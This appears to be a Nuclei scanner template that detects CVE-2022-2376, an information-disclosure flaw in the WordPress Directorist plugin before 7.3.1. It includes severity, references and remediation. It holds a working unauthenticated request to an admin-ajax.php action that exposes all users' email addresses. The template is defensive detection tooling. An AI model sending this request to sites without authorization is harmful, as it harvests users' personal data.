id: CVE-2022-2376 info: name: WordPress Directorist <7.3.1 - Information Disclosure author: Random-Robbie severity: medium description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users. remediation: Fixed in version 7.3.1. reference: - https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376 - https://nvd.nist.gov/vuln/detail/CVE-2022-2376 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-2376 cwe-id: CWE-862 epss-score: 0.04933 epss-percentile: 0.91889 cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: wpwax product: directorist framework: wordpress tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure http: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination' matchers-condition: and matchers: - type: word part: body words: - 'directorist-authors__card__details__top' - 'directorist-authors__card__info-list' condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a00473045022100a0ffc12603c7171e35f1e97586763de3ff5d9fc91881ad9e00e214490ac30a13022068bb2fb1acfd31d22b5a4116b2c3c90e833378d53266892a8f3dd21ede6e79ec:922c64590222798bb761d5b6d8e72950